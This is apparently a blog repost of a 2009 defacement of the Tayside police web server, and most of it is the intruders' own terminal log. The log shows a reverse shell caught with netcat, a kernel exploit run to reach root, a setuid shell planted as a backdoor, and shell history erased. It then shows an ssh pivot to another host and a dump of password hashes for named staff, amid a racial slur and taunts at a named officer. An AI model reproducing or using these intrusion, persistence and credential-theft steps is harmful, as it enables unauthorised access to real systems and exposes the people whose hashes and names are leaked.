Tayside Cop-puter Cracked, Pwned & Defaced

On August 20 2009, Paisley Young Team broke into the server of the Tayside police force. They had a quick look around and found nothing of interest (to them) before defacing the front page and posting the details of how they cracked the system right there. Their findings provide some insight into how the UK police computer network is set up and used. No software updates and >100 days since last root login, for example.

The defacement is archived here and reposted below in full. See also confirmation and comments at The Registry.

--- Repost below this line ---

HACKED BY FUCKING FRANKIE BOYLE

Click on a thumbnail for a slideshow view

"I'll tell you the tv show i'd love to see.. CSI:Glasgow.
Well we've done some prelimenary tests, and it looks like the intruder deffinately did a jobby on the carpet"

hacked by the paisley young team, more asbos than yer maw!

greets to: buckfast wine, that dobber pc plum, glasgow celtic, tennents super lager,
bono, the gay coppers that kept walking round my tent at T in the park when i was trying
to do lines of charlie

black power!

!!!!! SPECIAL THANKS TO THE FORCE'S FINEST IAN MCKENZIE FOR HIS AMAZINGLY SEKURE !!!!!
!!!!! AND FUCKING FRUITY PASSWORDS THAT MADE THIS WHOLE FUCKING THING POSSIBLE. !!!!!

***** HOW DO YOU LIKE THESE APPLES LOLOLOLOLOL!!!!!!!!1111one *****
n1gger@lulzbox:~$ nc -l -v -p 33333
listening on [any] 33333 ...
connect to [xx.xxx.xx.x] from stallion.cqm.co.uk [195.206.197.82] 35598
14:14:19 up 46 days, 23:55, 1 user, load average: 0.12, 0.47, 1.08
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - 22Feb08 105days 0.05s 0.05s -bash
Linux stallion 2.4.22-1.2115.nptl #1 Wed Oct 29 15:31:21 EST 2003 i686 athlon i386 GNU/Linux
uid=99(nobody) gid=99(nobody) groups=99(nobody)
/
apache: /root/.bashrc: Permission denied
apache-2.05b$ cd /tmp
apache-2.05b$ ls
mr
mysql.sock
ssh-MGY13992
ssh-upZg4483

##################################
###
### NOTE: This is probably the slowest fucking exploit in the history of
### computer hacking (obviously barring lcamtuf's furious assaults
### on common sense with his famed twentieth century CRONTAB exploits).
###
### To be honest we almost just gave up at this point, but instead we watched
### rangers on the telly for a bit and had a fish supper and a can of fucking TENENTS
### while we waited for the ELITENESS
###
##################################

apache-2.05b$ ./mr

[+] Please wait...HEAVY SYSTEM LOAD!
1114124 of 1114129 [ 99 % ETA 0.0 s ]
[+] overflow done, the moment of truth...
[+] parent unprotected PTE
depopulate SLAB #1
depopulate SLAB #2
depopulate SLAB #3
depopulate SLAB #4

[ JESUS CHRIST SAKE - OUTPUT CUT FOR SOME SEMBLENCE OF BREVITY ]

depopulate SLAB #337
[!] parent check race... SUCCESS, cought SLAB page!
[+] PID 25870 GOT UID 0, enjoy!

id
uid=0(root) gid=0(root) groups=99(nobody)
uname -a
Linux stallion 2.4.22-1.2115.nptl #1 Wed Oct 29 15:31:21 EST 2003 i686 athlon i386 GNU/Linux

##################################
### FINALLY, UID 0
###
### First things first, we have to add some backdoors, root hasn't even logged in for 105 days
### and their kernel is like something out of the Mesozoic era but none the less we have standards
###
##################################

pwd
/tmp
cd /websites/dev/files
ls
it_work_request1142348866.pdf
rsh
t2.php
t3.php
mkdir ...
cd ...
pwd
/websites/dev/files/...
mv ../t2.php .
mv ../rsh .
ls
rsh
t2.php
cp /bin/ash .
chmod a+s ash
ls
ash
rsh
t2.php
ls -al
total 116
drwxrwxrwx 2 root root 4096 Aug 19 16:21 .
drwxrwxrwx 3 dev dev 4096 Aug 19 16:21 ..
-rwsr-sr-x 1 root root 98268 Aug 19 16:21 ash
-rw-r--r-- 1 nobody nobody 2094 Jul 18 20:54 rsh
-rw-rw-rw- 1 mysql mysql 31 Aug 19 11:13 t2.php
w
16:22:38 up 47 days, 2:03, 1 user, load average: 0.31, 1.22, 1.53
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - 22Feb08 105days 0.05s 0.05s -bash
cd /home

##################################
###
### Ok let's have a look through the ~s and see if they have any highly
### sekret police documents to steal and run riot with down in the fucking GORBELS
###
##################################

ls
agow
backup
cqm
cqmftp
ianmckenzie
iansbremner
james
jay
karim
mark
peterk
praszkowski
rod
stuartswan
cd rod
ls
gd-2.0.33.tar.gz
test
webalizer-2.01-10-linuxelf-x86-bin.tgz
cd ..
cd peterk
ls
cd ../jay
ls
cd ../james
ls
ShowNews.php
tay.tar
vacancies.php
vacancy_details.php
vsftpd-1.1.3-8.i386.rpm
cd ..
cd praszkowski
ls
cd ../agow
ls
accesslogs.02.03.05
accesslogs.tayside.28.02.05
httpd.conf.17.12.2004
httpd.conf.28.02.05
httpd.conf.29.06.04.15.51
httpd.conf.6.1.5
myadmin
ssl.conf
stats.02.03.05
stats.tayside.28.02.05
taysidestatsfix
cd ..
cd cqm
ls
cd ../iansbremner
ls
cd ../ianmckenzie
ls
cd ..
cd karim
ls
cd ../mark
ls
unset HISTFILE
ls
cd /root
ls
anaconda-ks.cfg
install.log
install.log.syslog
mysqlaccess.log
rkhunter-1.3.0
rkhunter-1.3.0.tar.gz
time
vsftpd-1.1.3-8.i386.rpm
cd ..
ls
backups
bin
boot
dev
dump
dvdbackups
etc
home
initrd
lib
lost+found
misc
mnt
opt
proc
root
sbin
tmp
usr
var
websites
cd /home
ls
agow
backup
cqm
cqmftp
ianmckenzie
iansbremner
james
jay
karim
mark
peterk
praszkowski
rod
stuartswan
cat */.ssh/known_hosts
maverick.cqm.co.uk,195.206.197.25 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAtOUovG8uKLa8iGvVqo
XOfwl7cWdLOlEN2eqdtGWDXnju0Icj75ZAdv4cEuMOzfSTqnmyyxEp7frNSt56iydwbe1wkyGbSMRVHhcLhloou9
XcAs82YsGgpHrc9FrTNbhsmVPAYC6C0hWeYShFzjcTeg706aoMBXzb96yPd0Me8+8=
emerald.cqm.co.uk,195.206.197.50 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEApbFCfHwGFIxZDA3va1N
Sa7MUzEzkF7vozUNOnoFmPR7bXaP/Xm//svCZgbRJNM6nwAkLYMBtpf4ObsloEHTpxTbKnRoctXv0ifX1Wng3GYo
W1CJdAGeaMnKg5O9YfrQSS0jTgokm3gmhLLWnI9MDBgzhdB6SJ/mTvvsa2S9b4/0=
gecko.cqm.co.uk,195.206.197.43 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAvFnpufb3zdtNfGHMPndh/
1gyz7h1LofjDrSJN2fr6UCdOLrVEaqzpAbuOOAnwVfKk03C4jDiNSAhxdfQb3JDyTXw2tG9apUZBLoJ2d7jYIuh9
vdnFVNBCqVa2l7PjVfzjpiswv/KmvMHAUYZe6Aw+B3fJRoIKGuueB5qL4HgK5E=
cd cqm
ls
ls -al
total 24
drwx------ 2 cqm cqm 4096 Jun 9 2004 .
drwxr-xr-x 16 root root 4096 Jun 29 2007 ..
-rw------- 1 cqm cqm 4049 Jan 24 2008 .bash_history
-rw-r--r-- 1 cqm cqm 24 Jun 9 2004 .bash_logout
-rw-r--r-- 1 cqm cqm 191 Jun 9 2004 .bash_profile
-rw-r--r-- 1 cqm cqm 124 Jun 9 2004 .bashrc
cd ../mark
ls -al
total 24
drwx------ 2 mark mark 4096 May 26 2004 .
drwxr-xr-x 16 root root 4096 Jun 29 2007 ..
-rw------- 1 mark mark 34 May 28 2004 .bash_history
-rw-r--r-- 1 mark mark 24 May 26 2004 .bash_logout
-rw-r--r-- 1 mark mark 191 May 26 2004 .bash_profile
-rw-r--r-- 1 mark mark 124 May 26 2004 .bashrc
cd ../peterk
ls -al
total 24
drwx------ 2 peterk peterk 4096 Jul 3 2007 .
drwxr-xr-x 16 root root 4096 Jun 29 2007 ..
-rw------- 1 peterk peterk 403 Jan 7 2008 .bash_history
-rw-r--r-- 1 peterk peterk 24 Jun 19 2007 .bash_logout
-rw-r--r-- 1 peterk peterk 191 Jun 19 2007 .bash_profile
-rw-r--r-- 1 peterk peterk 124 Jun 19 2007 .bashrc
cd ../stuartswan
ls -al
total 24
drwx------ 2 stuartswan stuartswan 4096 Feb 18 2007 .
drwxr-xr-x 16 root root 4096 Jun 29 2007 ..
-rw------- 1 stuartswan stuartswan 115 Jun 8 2007 .bash_history
-rw-r--r-- 1 stuartswan stuartswan 24 Feb 13 2007 .bash_logout
-rw-r--r-- 1 stuartswan stuartswan 191 Feb 13 2007 .bash_profile
-rw-r--r-- 1 stuartswan stuartswan 124 Feb 13 2007 .bashrc
cd ../james
ls -al
total 292
drwx------ 3 james james 4096 Sep 6 2005 .
drwxr-xr-x 16 root root 4096 Jun 29 2007 ..
-rw------- 1 james james 2565 Sep 6 2005 .bash_history
-rw-r--r-- 1 james james 24 May 21 2004 .bash_logout
-rw-r--r-- 1 james james 191 May 21 2004 .bash_profile
-rw-r--r-- 1 james james 124 May 21 2004 .bashrc
drwx------ 2 james james 4096 Aug 8 2004 .ssh
-rw------- 1 james james 2116 Sep 5 2005 .viminfo
-rw-r--r-- 1 root root 6314 Jun 7 2004 ShowNews.php
-rw-rw-r-- 1 james james 133120 Sep 6 2005 tay.tar
-rw-r--r-- 1 james james 29590 Jun 7 2004 vacancies.php
-rw-r--r-- 1 james james 2197 May 27 2004 vacancy_details.php
-rw-r--r-- 1 james james 76611 May 27 2004 vsftpd-1.1.3-8.i386.rpm
cd .ssh
ls
known_hosts
cat known_hosts
maverick.cqm.co.uk,195.206.197.25 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAtOUovG8uKLa8iGvVqoXO
fwl7cWdLOlEN2eqdtGWDXnju0Icj75ZAdv4cEuMOzfSTqnmyyxEp7frNSt56iydwbe1wkyGbSMRVHhcLhloou9XcAs
82YsGgpHrc9FrTNbhsmVPAYC6C0hWeYShFzjcTeg706aoMBXzb96yPd0Me8+8=
cd ../jay
bash: line 77: cd: ../jay: No such file or directory
cd ../../jay
ls -al
total 24
drwx------ 2 jay jay 4096 Feb 4 2008 .
drwxr-xr-x 16 root root 4096 Jun 29 2007 ..
-rw------- 1 jay jay 30 Mar 22 2008 .bash_history
-rw-r--r-- 1 jay jay 24 Jun 14 2006 .bash_logout
-rw-r--r-- 1 jay jay 191 Jun 14 2006 .bash_profile
-rw-r--r-- 1 jay jay 124 Jun 14 2006 .bashrc
cd ../karim
ls -al
total 24
drwx------ 2 karim karim 4096 Sep 17 2004 .
drwxr-xr-x 16 root root 4096 Jun 29 2007 ..
-rw------- 1 karim karim 1069 Feb 22 2006 .bash_history
-rw-r--r-- 1 karim karim 24 Sep 16 2004 .bash_logout
-rw-r--r-- 1 karim karim 191 Sep 16 2004 .bash_profile
-rw-r--r-- 1 karim karim 124 Sep 16 2004 .bashrc
cd ..
cd ianmckenzie
ls -al
total 24
drwx------ 2 ianmckenzie ianmckenzie 4096 Jun 30 2007 .
drwxr-xr-x 16 root root 4096 Jun 29 2007 ..
-rw------- 1 ianmckenzie ianmckenzie 10 Jun 30 2007 .bash_history
-rw-r--r-- 1 ianmckenzie ianmckenzie 24 Jun 29 2007 .bash_logout
-rw-r--r-- 1 ianmckenzie ianmckenzie 191 Jun 29 2007 .bash_profile
-rw-r--r-- 1 ianmckenzie ianmckenzie 124 Jun 29 2007 .bashrc
cd ../iansbremner
ls -al
total 24
drwx------ 2 iansbremner iansbremner 4096 Jul 2 2007 .
drwxr-xr-x 16 root root 4096 Jun 29 2007 ..
-rw------- 1 iansbremner iansbremner 559 Oct 24 2008 .bash_history
-rw-r--r-- 1 iansbremner iansbremner 24 Jun 21 2007 .bash_logout
-rw-r--r-- 1 iansbremner iansbremner 191 Jun 21 2007 .bash_profile
-rw-r--r-- 1 iansbremner iansbremner 124 Jun 21 2007 .bashrc
cd ../agow
ls -al
total 212
drwx------ 7 agow agow 4096 Mar 2 2005 .
drwxr-xr-x 16 root root 4096 Jun 29 2007 ..
-rw------- 1 agow agow 517 Mar 27 2006 .bash_history
-rw-r--r-- 1 agow agow 24 Jun 29 2004 .bash_logout
-rw-r--r-- 1 agow agow 191 Jun 29 2004 .bash_profile
-rw-r--r-- 1 agow agow 124 Jun 29 2004 .bashrc
drwxr-xr-x 2 root root 4096 Mar 2 2005 accesslogs.02.03.05
drwxr-xr-x 2 root root 4096 Feb 28 2005 accesslogs.tayside.28.02.05
-rw-r--r-- 1 root root 36699 Dec 17 2004 httpd.conf.17.12.2004
-rw-r--r-- 1 root root 38604 Feb 28 2005 httpd.conf.28.02.05
-rw-r--r-- 1 root root 36485 Jun 29 2004 httpd.conf.29.06.04.15.51
-rw-r--r-- 1 root root 37513 Jan 6 2005 httpd.conf.6.1.5
drwxr-xr-x 7 root root 4096 Jan 13 2005 myadmin
-rw-r--r-- 1 root root 11457 Feb 28 2005 ssl.conf
drwxr-xr-x 3 root root 4096 Mar 2 2005 stats.02.03.05
drwxr-xr-x 3 root root 4096 Feb 28 2005 stats.tayside.28.02.05
-rw-r--r-- 1 root root 522 Feb 28 2005 taysidestatsfix
cd ../rod
ls -al
total 1164
drwx------ 4 rod rod 4096 Dec 17 2004 .
drwxr-xr-x 16 root root 4096 Jun 29 2007 ..
-rw------- 1 rod rod 1625 Feb 20 2008 .bash_history
-rw-r--r-- 1 rod rod 24 May 21 2004 .bash_logout
-rw-r--r-- 1 rod rod 191 May 21 2004 .bash_profile
-rw-r--r-- 1 rod rod 124 May 21 2004 .bashrc
drwx------ 2 rod rod 4096 May 27 2004 .ssh
-rw-rw-r-- 1 rod rod 587617 Dec 17 2004 gd-2.0.33.tar.gz
drwxr-xr-x 7 root root 4096 Jun 21 2004 test
-rw-rw-r-- 1 rod rod 557825 Dec 17 2004 webalizer-2.01-10-linuxelf-x86-bin.tgz
cd .ssh
ls -al
total 12
drwx------ 2 rod rod 4096 May 27 2004 .
drwx------ 4 rod rod 4096 Dec 17 2004 ..
-rw-r--r-- 1 rod rod 482 Dec 17 2004 known_hosts
cat known_hosts
emerald.cqm.co.uk,195.206.197.50 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEApbFCfHwGFIxZDA3va1NS
a7MUzEzkF7vozUNOnoFmPR7bXaP/Xm//svCZgbRJNM6nwAkLYMBtpf4ObsloEHTpxTbKnRoctXv0ifX1Wng3GYoW1
CJdAGeaMnKg5O9YfrQSS0jTgokm3gmhLLWnI9MDBgzhdB6SJ/mTvvsa2S9b4/0=
gecko.cqm.co.uk,195.206.197.43 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAvFnpufb3zdtNfGHMPndh/1
gyz7h1LofjDrSJN2fr6UCdOLrVEaqzpAbuOOAnwVfKk03C4jDiNSAhxdfQb3JDyTXw2tG9apUZBLoJ2d7jYIuh9vd
nFVNBCqVa2l7PjVfzjpiswv/KmvMHAUYZe6Aw+B3fJRoIKGuueB5qL4HgK5E=
cd ..
ls
gd-2.0.33.tar.gz
test
webalizer-2.01-10-linuxelf-x86-bin.tgz
pwd
/home/rod
file test
test: directory
cd test
ls -al
total 138556
drwxr-xr-x 7 root root 4096 Jun 21 2004 .
drwx------ 4 rod rod 4096 Dec 17 2004 ..
drwxr-xr-x 2 root root 4096 May 28 2004 dump
drwxr-xr-x 55 root root 4096 Jun 21 2004 etc
-r-xr-xr-x 1 root root 141705437 Jun 21 2004 stallion.tgz
drwxr-xr-x 3 root root 4096 Jun 21 2004 usr
drwxr-xr-x 3 root root 4096 Jun 21 2004 var
drwxr-xr-x 4 root root 4096 Jun 7 2004 websites

##################################
###
### Typically, the fuzz, along with not having a clue, also don't even have
### any interesting documents. At all. So we did the only possible thing we
### we could and opened up a few extra cans of Tenents and put the bagpipe music
### on while we waited for our mother's valiums to kick in and hacked some of
### those boxes from the known_hosts files
###
##################################

python -c "import pty
pty.spawn('/bin/bash')"
No value for $TERM and no -T specified
No value for $TERM and no -T specified
[root@stallion /]# unset HISTFILE
unset HISTFILE

[root@stallion /]# cd /root
cd /root
c[root@stallion root]# at .bash_history | grep ssh
cat .bash_history | grep ssh
ssh -l praszkowski 192.153.153.158
cat /root/.ssh/id_rsa.pub
ssh-keygen -t rsa
cat /root/.ssh/id_rsa.pub
ssh -l rsyncbackup cheeta.cqm.co.uk
[root@stallion root]# ssh -l rsyncbackup cheeta.cqm.co.uk '/bin/sh -i'
ssh -l rsyncbackup cheeta.cqm.co.uk '/bin/sh -i'
sh-3.2$ unset HISTFILE
unset HISTFILE
sh-3.2$ w
w
14:37:20 up 1 day, 17:22, 2 users, load average: 3.68, 3.83, 3.78
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
praszkow pts/0 homer.colloquium Tue21 3:07m 0.07s 0.79s sshd: praszkows
rod pts/1 homer.colloquium Wed11 1:30m 0.21s 0.02s sshd: rod [priv
sh-3.2$ uname -a
uname -a
Linux cheeta.colloquium.co.uk 2.6.18-128.4.1.el5 #1 SMP Tue Aug 4 20:23:34 EDT 2009 i686 athlon i386 GNU/Linux
sh-3.2$ python -c "import pty
python -c "import pty
> pty.spawn('/bin/bash')"
pty.spawn('/bin/bash')"
[rsyncbackup@cheeta ~]$ unset HISTFILE
unset HISTFILE
unset HISTFILE
[rsyncbackup@cheeta ~]$ w
w
w
14:37:59 up 1 day, 17:23, 2 users, load average: 3.69, 3.81, 3.77
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
praszkow pts/0 homer.colloquium Tue21 3:08m 0.07s 0.79s sshd: praszkows
rod pts/1 homer.colloquium Wed11 1:30m 0.21s 0.02s sshd: rod [priv
[rsyncbackup@cheeta ~]$ su
su
su
Password: 1smat00n
1smat00n

su: incorrect password

##################################
###
### Well that was pretty fucking disappointing, but they don't seem to use the same root
### password across all their boxes... too bad. We could have rooted it with any one of
### various fucking kernel 0days but the idea of losing one while rooting these fucks
### was too much to bear.
###
###
### So there's not more left to fucking do than drop these fucks' hashes and run...
###
### root:$1$mC3bm0M0$QAHCSVyQN88t7tE9JtNhq/:13770:0:99999:7:::
### rod:$1$d0OZ5zNo$o4Yz0sUeOjhmE6et2eMKO.:12566:0:99999:7:::
### james:$1$akYkxedb$QHklxxxhRzUkpFZdpOd1h1:12559:0:99999:7:::
### mark:$1$W4ELS6n8$qgZVYP3z7d1w5914AOaow.:12564:0:99999:7:::
### taysidepolice:$1$0p8iRAUu$6iOwg0LpUFGk2rdHMoYQr.:12576:0:99999:7:::
### cqm:$1$8p6STqh4$bWr6trzofzxNLWeptW27B/:13549:0:99999:7:::
### cqmftp:$1$hpaREPUO$kwm7gu9AS8FR1LFGl8Zqo.:12664:0:99999:7:::
### agow:$1$bLelOqTt$27fvhTnUoqZXeiQb60Edk/:12607:0:99999:7:::
### karim:$1$nrVT.2S1$XhuzeDLHDVHLJdEvcHSHl/:12678:0:99999:7:::
### stats:$1$m0cxzrqg$/18ish8HacMbB0tsR6iFU1:12769:0:99999:7:::
### mgt:$1$l9Icz4vK$cAchOnW/An79RRJu4fKZZ.:12769:0:99999:7:::
### dev:$1$jCo28Sqg$A/TtN92yHQfUxDngfjsJG.:12769:0:99999:7:::
### taysc:$1$/ryO6yPH$G9lF6RVcQQE4HyJ9.qlQt1:12930:0:99999:7:::
### jay:$1$WP/CLqCQ$iLZuLjgZPtpTKuL8Cyh3v1:13902:0:99999:7:::
### stuartswan:$1$cWqa4Atg$Xsb0sSt2D7fcvIDrGETl8/:13557:0:99999:7:::
### praszkowski:$1$6fsLuTyw$wNJeAocQMOVGtA9URdvpF/:13574:0:99999:7:::
### peterk:$1$NyIUr2OS$D3Ve31iFLgDk8xZpHni6O1:13683:0:99999:7:::
### iansbremner:$1$T7ZAZyqp$ReVeBZf00XQLBZLpZauqi0:13685:0:99999:7:::
### ianmckenzie:$1$J7vayAhB$MVYkOeMU0Gmjftkz/ipED1:13693:0:99999:7:::
###
##################################